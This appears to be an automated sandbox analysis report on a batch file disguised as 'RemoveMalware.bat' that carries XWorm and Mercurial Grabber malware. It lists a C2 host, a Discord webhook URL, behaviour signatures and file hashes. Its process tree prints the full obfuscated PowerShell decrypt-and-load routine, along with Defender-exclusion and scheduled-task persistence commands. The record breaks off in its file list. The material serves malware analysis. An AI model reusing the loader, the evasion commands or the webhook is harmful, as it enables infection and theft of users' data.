Analysis

  • max time kernel
    150s
  • max time network
    153s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240611-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240611-enlocale:en-usos:windows10-2004-x64system
  • submitted
    02-07-2024 00:05

General

  • Target

    RemoveMalware.bat

  • Size

    391KB

  • MD5

    d8a7740fc4dfa66c80eedb47bb8b15c2

  • SHA1

    4a6b941faf000a318e946d59f7ed53b595981200

  • SHA256

    2d16ba84b31661bb02d59a4cb963a8600dfcec2d10e256cae46911a4c719bc25

  • SHA512

    6253821c13e4e835b701cd493465d914667434905c13fdd685fd6ce554f37c6a4b0d6e58a8ed3da9b25a68facc55a5516d0318e5a7c38c494a7cfb6c53717181

  • SSDEEP

    6144:JbFM40+hSvrpCkScwdwo6mliTcf4UeZbOL0mWPxuxUYsSQJ+beiU:d7hSdvJwdwMiTc43OLtWo9YIw

Malware Config

Extracted

Family

xworm

C2

wiz.bounceme.net:6000

Attributes
  • install_file

    USB.exe

aes.plain

Extracted

Family

mercurialgrabber

C2

https://discordapp.com/api/webhooks/1256033718615801999/30uWN_aNeK535vYxz4VbBzXef1VOIVGrPIFsTv-L91_8YPN5UWyf6TKGfk-GmCmwftJo

Signatures

  • Contains code to disable Windows Defender 1 IoCs

    A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.

  • Detect Xworm Payload 2 IoCs
  • Mercurial Grabber Stealer

    Mercurial Grabber is an open source stealer targeting Chrome, Discord and some game clients as well as generic system information.

  • Xworm

    Xworm is a remote access trojan written in C#.

  • Looks for VirtualBox Guest Additions in registry 2 TTPs 1 IoCs
  • Blocklisted process makes network request 13 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Run Powershell and hide display window.

  • Looks for VMWare Tools registry key 2 TTPs 1 IoCs
  • Checks BIOS information in registry 2 TTPs 1 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Drops startup file 2 IoCs
  • Executes dropped EXE 1 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Enumerates connected drives 3 TTPs 23 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Looks up external IP address via web service 3 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Maps connected drives based on registry 3 TTPs 2 IoCs

    Disk information is often read in order to detect sandboxing environments.

  • Drops file in System32 directory 12 IoCs
  • Checks SCSI registry key(s) 3 TTPs 1 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 4 IoCs
  • Modifies data under HKEY_USERS 42 IoCs
  • Modifies registry class 36 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\system32\svchost.exe
    C:\Windows\system32\svchost.exe -k DcomLaunch -p
    1⤵
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:792
    • C:\Windows\system32\wbem\wmiprvse.exe
      C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
      2⤵
        PID:1676
      • C:\Windows\System32\mousocoreworker.exe
        C:\Windows\System32\mousocoreworker.exe -Embedding
        2⤵
          PID:5116
        • C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe
          C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe -Embedding
          2⤵
            PID:2720
          • C:\Windows\system32\backgroundTaskHost.exe
            "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
            2⤵
              PID:2340
            • C:\Windows\system32\backgroundTaskHost.exe
              "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
              2⤵
                PID:3604
              • C:\Windows\system32\BackgroundTransferHost.exe
                "BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1
                2⤵
                  PID:2652
                • C:\Windows\system32\BackgroundTransferHost.exe
                  "BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1
                  2⤵
                    PID:2268
                  • C:\Windows\system32\backgroundTaskHost.exe
                    "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
                    2⤵
                      PID:840
                    • C:\Windows\system32\BackgroundTransferHost.exe
                      "BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1
                      2⤵
                        PID:2340
                      • C:\Windows\system32\BackgroundTransferHost.exe
                        "BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1
                        2⤵
                          PID:1084
                        • C:\Windows\system32\backgroundTaskHost.exe
                          "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
                          2⤵
                            PID:4316
                          • C:\Windows\system32\backgroundTaskHost.exe
                            "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
                            2⤵
                              PID:3944
                            • C:\Windows\system32\BackgroundTaskHost.exe
                              "C:\Windows\system32\BackgroundTaskHost.exe" -ServerName:BackgroundTaskHost.WebAccountProvider
                              2⤵
                                PID:1880
                              • C:\Windows\System32\RuntimeBroker.exe
                                C:\Windows\System32\RuntimeBroker.exe -Embedding
                                2⤵
                                  PID:4352
                              • C:\Windows\system32\svchost.exe
                                C:\Windows\system32\svchost.exe -k RPCSS -p
                                1⤵
                                  PID:904
                                • C:\Windows\system32\svchost.exe
                                  C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
                                  1⤵
                                    PID:948
                                  • C:\Windows\system32\svchost.exe
                                    C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
                                    1⤵
                                      PID:736
                                    • C:\Windows\System32\svchost.exe
                                      C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
                                      1⤵
                                        PID:1016
                                      • C:\Windows\system32\svchost.exe
                                        C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork -p
                                        1⤵
                                          PID:1040
                                        • C:\Windows\System32\svchost.exe
                                          C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                                          1⤵
                                            PID:1100
                                          • C:\Windows\system32\svchost.exe
                                            C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
                                            1⤵
                                              PID:1116
                                            • C:\Windows\system32\svchost.exe
                                              C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
                                              1⤵
                                              • Drops file in System32 directory
                                              PID:1156
                                              • C:\Users\Admin\AppData\Roaming\powershell.exe
                                                C:\Users\Admin\AppData\Roaming\powershell.exe
                                                2⤵
                                                • Executes dropped EXE
                                                PID:2424
                                            • C:\Windows\System32\svchost.exe
                                              C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
                                              1⤵
                                              • Drops file in System32 directory
                                              PID:1184
                                            • C:\Windows\system32\svchost.exe
                                              C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
                                              1⤵
                                                PID:1256
                                              • C:\Windows\system32\svchost.exe
                                                C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
                                                1⤵
                                                  PID:1308
                                                • C:\Windows\system32\svchost.exe
                                                  C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
                                                  1⤵
                                                    PID:1340
                                                  • C:\Windows\system32\svchost.exe
                                                    C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
                                                    1⤵
                                                      PID:1396
                                                    • C:\Windows\system32\svchost.exe
                                                      C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
                                                      1⤵
                                                        PID:1412
                                                      • C:\Windows\system32\svchost.exe
                                                        C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
                                                        1⤵
                                                          PID:1560
                                                        • C:\Windows\System32\svchost.exe
                                                          C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
                                                          1⤵
                                                            PID:1572
                                                          • C:\Windows\System32\svchost.exe
                                                            C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
                                                            1⤵
                                                              PID:1592
                                                            • C:\Windows\system32\svchost.exe
                                                              C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
                                                              1⤵
                                                                PID:1724
                                                              • C:\Windows\System32\svchost.exe
                                                                C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
                                                                1⤵
                                                                  PID:1740
                                                                • C:\Windows\System32\svchost.exe
                                                                  C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
                                                                  1⤵
                                                                    PID:1764
                                                                  • C:\Windows\System32\svchost.exe
                                                                    C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                                    1⤵
                                                                      PID:1844
                                                                    • C:\Windows\system32\svchost.exe
                                                                      C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
                                                                      1⤵
                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                      PID:1996
                                                                    • C:\Windows\system32\svchost.exe
                                                                      C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
                                                                      1⤵
                                                                        PID:2032
                                                                      • C:\Windows\system32\svchost.exe
                                                                        C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
                                                                        1⤵
                                                                          PID:1368
                                                                        • C:\Windows\System32\svchost.exe
                                                                          C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                                          1⤵
                                                                            PID:1520
                                                                          • C:\Windows\System32\svchost.exe
                                                                            C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
                                                                            1⤵
                                                                              PID:944
                                                                            • C:\Windows\system32\svchost.exe
                                                                              C:\Windows\system32\svchost.exe -k LocalServiceNoNetworkFirewall -p
                                                                              1⤵
                                                                                PID:2184
                                                                              • C:\Windows\System32\svchost.exe
                                                                                C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
                                                                                1⤵
                                                                                  PID:2232
                                                                                • C:\Windows\System32\svchost.exe
                                                                                  C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
                                                                                  1⤵
                                                                                    PID:2348
                                                                                  • C:\Windows\system32\svchost.exe
                                                                                    C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
                                                                                    1⤵
                                                                                      PID:2464
                                                                                    • C:\Windows\system32\svchost.exe
                                                                                      C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
                                                                                      1⤵
                                                                                        PID:2472
                                                                                      • C:\Windows\system32\svchost.exe
                                                                                        C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
                                                                                        1⤵
                                                                                          PID:2644
                                                                                        • C:\Windows\system32\svchost.exe
                                                                                          C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
                                                                                          1⤵
                                                                                          • Drops file in System32 directory
                                                                                          • Modifies data under HKEY_USERS
                                                                                          PID:2688
                                                                                        • C:\Windows\system32\svchost.exe
                                                                                          C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
                                                                                          1⤵
                                                                                          • Enumerates connected drives
                                                                                          PID:2696
                                                                                        • C:\Windows\System32\svchost.exe
                                                                                          C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
                                                                                          1⤵
                                                                                            PID:2792
                                                                                          • C:\Windows\system32\svchost.exe
                                                                                            C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
                                                                                            1⤵
                                                                                              PID:2812
                                                                                            • C:\Windows\system32\svchost.exe
                                                                                              C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
                                                                                              1⤵
                                                                                                PID:3016
                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
                                                                                                1⤵
                                                                                                  PID:3304
                                                                                                • C:\Windows\Explorer.EXE
                                                                                                  C:\Windows\Explorer.EXE
                                                                                                  1⤵
                                                                                                  • Suspicious use of UnmapMainImage
                                                                                                  PID:3392
                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\RemoveMalware.bat"
                                                                                                    2⤵
                                                                                                    • Suspicious use of WriteProcessMemory
                                                                                                    PID:2140
                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                      C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('IjJvKUiZ3qVbekS9RBld+s/2H9KCxAMxfp72UAdOekw='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('RSqfgbsxY4tQviMhgruGlA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $mTJVo=New-Object System.IO.MemoryStream(,$param_var); $OVEZJ=New-Object System.IO.MemoryStream; $xpowC=New-Object System.IO.Compression.GZipStream($mTJVo, [IO.Compression.CompressionMode]::Decompress); $xpowC.CopyTo($OVEZJ); $xpowC.Dispose(); $mTJVo.Dispose(); $OVEZJ.Dispose(); $OVEZJ.ToArray();}function execute_function($param_var,$param2_var){ $aXdmE=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $plyTG=$aXdmE.EntryPoint; $plyTG.Invoke($null, $param2_var);}$DUACE = 'C:\Users\Admin\AppData\Local\Temp\RemoveMalware.bat';$host.UI.RawUI.WindowTitle = $DUACE;$NSEOn=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($DUACE).Split([Environment]::NewLine);foreach ($fxoWu in $NSEOn) { if ($fxoWu.StartsWith('WopmnYnvzYwvYHEKXXam')) { $rQXdu=$fxoWu.Substring(20); break; }}$payloads_var=[string[]]$rQXdu.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
                                                                                                      3⤵
                                                                                                        PID:3936
                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
                                                                                                        3⤵
                                                                                                        • Looks for VirtualBox Guest Additions in registry
                                                                                                        • Blocklisted process makes network request
                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                        • Looks for VMWare Tools registry key
                                                                                                        • Checks BIOS information in registry
                                                                                                        • Drops startup file
                                                                                                        • Adds Run key to start application
                                                                                                        • Maps connected drives based on registry
                                                                                                        • Checks SCSI registry key(s)
                                                                                                        • Checks processor information in registry
                                                                                                        • Enumerates system info in registry
                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                                        • Suspicious use of WriteProcessMemory
                                                                                                        PID:788
                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
                                                                                                          4⤵
                                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                          PID:1976
                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'powershell.exe'
                                                                                                          4⤵
                                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                          PID:3664
                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\powershell.exe'
                                                                                                          4⤵
                                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                          PID:208
                                                                                                        • C:\Windows\System32\schtasks.exe
                                                                                                          "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "powershell" /tr "C:\Users\Admin\AppData\Roaming\powershell.exe"
                                                                                                          4⤵
                                                                                                          • Scheduled Task/Job: Scheduled Task
                                                                                                          PID:3164
                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                    C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
                                                                                                    1⤵
                                                                                                      PID:3548
                                                                                                    • C:\Windows\System32\svchost.exe
                                                                                                      C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
                                                                                                      1⤵
                                                                                                        PID:4540
                                                                                                      • C:\Windows\system32\svchost.exe
                                                                                                        C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                                                                                                        1⤵
                                                                                                        • Modifies data under HKEY_USERS
                                                                                                        PID:4820
                                                                                                      • C:\Windows\System32\svchost.exe
                                                                                                        C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
                                                                                                        1⤵
                                                                                                          PID:400
                                                                                                        • C:\Windows\system32\svchost.exe
                                                                                                          C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
                                                                                                          1⤵
                                                                                                            PID:2040
                                                                                                          • C:\Windows\system32\svchost.exe
                                                                                                            C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
                                                                                                            1⤵
                                                                                                            • Modifies data under HKEY_USERS
                                                                                                            PID:2788
                                                                                                          • C:\Windows\system32\svchost.exe
                                                                                                            C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
                                                                                                            1⤵
                                                                                                              PID:3140
                                                                                                            • C:\Windows\system32\svchost.exe
                                                                                                              C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
                                                                                                              1⤵
                                                                                                                PID:1288

                                                                                                              Network

                                                                                                              MITRE ATT&CK Matrix ATT&CK v13

                                                                                                              Execution

                                                                                                              Command and Scripting Interpreter

                                                                                                              1
                                                                                                              T1059

                                                                                                              PowerShell

                                                                                                              1
                                                                                                              T1059.001

                                                                                                              Scheduled Task/Job

                                                                                                              1
                                                                                                              T1053

                                                                                                              Scheduled Task

                                                                                                              1
                                                                                                              T1053.005

                                                                                                              Persistence

                                                                                                              Boot or Logon Autostart Execution

                                                                                                              1
                                                                                                              T1547

                                                                                                              Registry Run Keys / Startup Folder

                                                                                                              1
                                                                                                              T1547.001

                                                                                                              Scheduled Task/Job

                                                                                                              1
                                                                                                              T1053

                                                                                                              Scheduled Task

                                                                                                              1
                                                                                                              T1053.005

                                                                                                              Privilege Escalation

                                                                                                              Boot or Logon Autostart Execution

                                                                                                              1
                                                                                                              T1547

                                                                                                              Registry Run Keys / Startup Folder

                                                                                                              1
                                                                                                              T1547.001

                                                                                                              Scheduled Task/Job

                                                                                                              1
                                                                                                              T1053

                                                                                                              Scheduled Task

                                                                                                              1
                                                                                                              T1053.005

                                                                                                              Defense Evasion

                                                                                                              Virtualization/Sandbox Evasion

                                                                                                              2
                                                                                                              T1497

                                                                                                              Modify Registry

                                                                                                              1
                                                                                                              T1112

                                                                                                              Discovery

                                                                                                              Query Registry

                                                                                                              9
                                                                                                              T1012

                                                                                                              Virtualization/Sandbox Evasion

                                                                                                              2
                                                                                                              T1497

                                                                                                              System Information Discovery

                                                                                                              6
                                                                                                              T1082

                                                                                                              Peripheral Device Discovery

                                                                                                              3
                                                                                                              T1120

                                                                                                              Replay Monitor

                                                                                                              Loading Replay Monitor...

                                                                                                              Downloads

                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
                                                                                                                Filesize

                                                                                                                2KB

                                                                                                                MD5

                                                                                                                d85ba6ff808d9e5444a4b369f5bc2730

                                                                                                                SHA1

                                                                                                                31aa9d96590fff6981b315e0b391b575e4c0804a

                                                                                                                SHA256

                                                                                                                84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

                                                                                                                SHA512

                                                                                                                8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
                                                                                                                Filesize

                                                                                                                53KB

                                                                                                                MD5

                                                                                                                a26df49623eff12a70a93f649776dab7

                                                                                                                SHA1

                                                                                                                efb53bd0df3ac34bd119adf8788127ad57e53803

                                                                                                                SHA256

                                                                                                                4ebde1c12625cb55034d47e5169f709b0bd02a8caa76b5b9854efad7f4710245

                                                                                                                SHA512

                                                                                                                e5f9b8645fb2a50763fcbffe877ca03e9cadf099fe2d510b74bfa9ff18d0a6563d11160e00f495eeefebde63450d0ade8d6b6a824e68bd8a59e1971dc842709c

                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                                                                Filesize

                                                                                                                944B

                                                                                                                MD5

                                                                                                                d28a889fd956d5cb3accfbaf1143eb6f

                                                                                                                SHA1

                                                                                                                157ba54b365341f8ff06707d996b3635da8446f7

                                                                                                                SHA256

                                                                                                                21e5d7ccf80a293e6ba30ed728846ca19c929c52b96e2c8d34e27cd2234f1d45

                                                                                                                SHA512

                                                                                                                0b6d88deb9be85722e6a78d5886d49f2caf407a59e128d2b4ed74c1356f9928c40048a62731959f2460e9ff9d9feee311043d2a37abe3bb92c2b76a44281478c

                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                                                                Filesize

                                                                                                                944B

                                                                                                                MD5

                                                                                                                e60eb305a7b2d9907488068b7065abd3

                                                                                                                SHA1

                                                                                                                1643dd7f915ac50c75bc01c53d68c5dafb9ce28d

                                                                                                                SHA256

                                                                                                                ad07460e061642c0dd4e7dfa7b821aacce873e290389e72f708e9f3504f9d135

                                                                                                                SHA512

                                                                                                                95c45afec6fa4e0b2a21edd10a6b2dc30568810c67bc9bc34d98ab111c48261f377a370583adb27e08616b0108026c119493b1b093b52ce931117e646b46cb7b

                                                                                                              • C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749
                                                                                                                Filesize

                                                                                                                330B

                                                                                                                MD5

                                                                                                                fc89e7c7c31af712ed53ab62ed37ba5a

                                                                                                                SHA1

                                                                                                                76468a20f84de35cf68f306d03ebe60ce7d1e8db

                                                                                                                SHA256

                                                                                                                b470efe1f5d69d2604e08c44fd9b9511134c7a57e00667f71ece9a85f67099ce

                                                                                                                SHA512

                                                                                                                c2fe94ffc272d8b335ecfbc5444477fe1c90f2c46f7502c8b5a1dd89ccea760e1a3fe9ac30f182049b872d2075ea20db7dddc85907db7400c7d6c655bb631d59

                                                                                                              • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_3juolrvd.yr3.ps1
                                                                                                                Filesize

                                                                                                                60B

                                                                                                                MD5

                                                                                                                d17fe0a3f47be24a6453e9ef58c94641

                                                                                                                SHA1

                                                                                                                6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                                                                SHA256

                                                                                                                96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                                                                SHA512

                                                                                                                5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                                                              • C:\Users\Admin\AppData\Roaming\powershell.exe
                                                                                                                Filesize

                                                                                                                442KB

                                                                                                                MD5

                                                                                                                04029e121a0cfa5991749937dd22a1d9

                                                                                                                SHA1

                                                                                                                f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

                                                                                                                SHA256

                                                                                                                9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

                                                                                                                SHA512

                                                                                                                6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

                                                                                                              • C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work
                                                                                                                Filesize

                                                                                                                2KB

                                                                                                                MD5

                                                                                                                8abf2d6067c6f3191a015f84aa9b6efe

                                                                                                                SHA1

                                                                                                                98f2b0a5cdb13cd3d82dc17bd43741bf0b3496f7

                                                                                                                SHA256

                                                                                                                ee18bd3259f220c41062abcbe71a421da3e910df11b9f86308a16cdc3a66fbea

                                                                                                                SHA512

                                                                                                                c2d686a6373efcff583c1ef50c144c59addb8b9c4857ccd8565cd8be3c94b0ac0273945167eb04ebd40dfb0351e4b66cffe4c4e478fb7733714630a11f765b63

                                                                                                              • C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work
                                                                                                                Filesize

                                                                                                                2KB

                                                                                                                MD5

                                                                                                                f313c5b4f95605026428425586317353

                                                                                                                SHA1

                                                                                                                06be66fa06e1cffc54459c38d3d258f46669d01a

                                                                                                                SHA256

                                                                                                                129d0b993cd3858af5b7e87fdf74d8e59e6f2110184b5c905df8f5f6f2c39d8b

                                                                                                                SHA512

                                                                                                                b87a829c86eff1d10e1590b18a9909f05101a535e5f4cef914a4192956eb35a8bfef614c9f95d53783d77571687f3eb3c4e8ee2f24d23ad24e0976d8266b8890

                                                                                                              • C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work
                                                                                                                Filesize

                                                                                                                2KB

                                                                                                                MD5

                                                                                                                ceb7caa4e9c4b8d760dbf7e9e5ca44c5

                                                                                                                SHA1

                                                                                                                a3879621f9493414d497ea6d70fbf17e283d5c08

                                                                                                                SHA256

                                                                                                                98c054088df4957e8d6361fd2539c219bcf35f8a524aad8f5d1a95f218e990e9

                                                                                                                SHA512

                                                                                                                1eddfbf4cb62d3c5b4755a371316304aaeabb00f01bad03fb4f925a98a2f0824f613537d86deddd648a74d694dc13ed5183e761fdc1ec92589f6fa28beb7fbff

                                                                                                              • C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work
                                                                                                                Filesize

                                                                                                                2KB

                                                                                                                MD5

                                                                                                                7d612892b20e70250dbd00d0cdd4f09b

                                                                                                                SHA1

                                                                                                                63251cfa4e5d6cbf6fb14f6d8a7407dbe763d3f5

                                                                                                                SHA256

                                                                                                                727c9e7b91e144e453d5b32e18f12508ee84dabe71bc852941d9c9b4923f9e02

                                                                                                                SHA512

                                                                                                                f8d481f3300947d49ce5ab988a9d4e3154746afccc97081cbed1135ffb24fc107203d485dda2d5d714e74e752c614d8cfd16781ea93450fe782ffae3f77066d1

                                                                                                              • C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work
                                                                                                                Filesize

                                                                                                                2KB

                                                                                                                MD5

                                                                                                                1e8e2076314d54dd72e7ee09ff8a52ab

                                                                                                                SHA1

                                                                                                                5fd0a67671430f66237f483eef39ff599b892272

                                                                                                                SHA256

                                                                                                                55f203d6b40a39a6beba9dd3a2cb9034284f49578009835dd4f0f8e1db6ebe2f

                                                                                                                SHA512

                                                                                                                5b0c97284923c4619d9c00cba20ce1c6d65d1826abe664c390b04283f7a663256b4a6efe51f794cb5ec82ccea80307729addde841469da8d041cbcfd94feb0f6

                                                                                                              • C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work
                                                                                                                Filesize

                                                                                                                2KB

                                                                                                                MD5

                                                                                                                0b990e24f1e839462c0ac35fef1d119e

                                                                                                                SHA1

                                                                                                                9e17905f8f68f9ce0a2024d57b537aa8b39c6708

                                                                                                                SHA256

                                                                                                                a1106ed0845cd438e074344e0fe296dc10ee121a0179e09398eaaea2357c614a

                                                                                                                SHA512

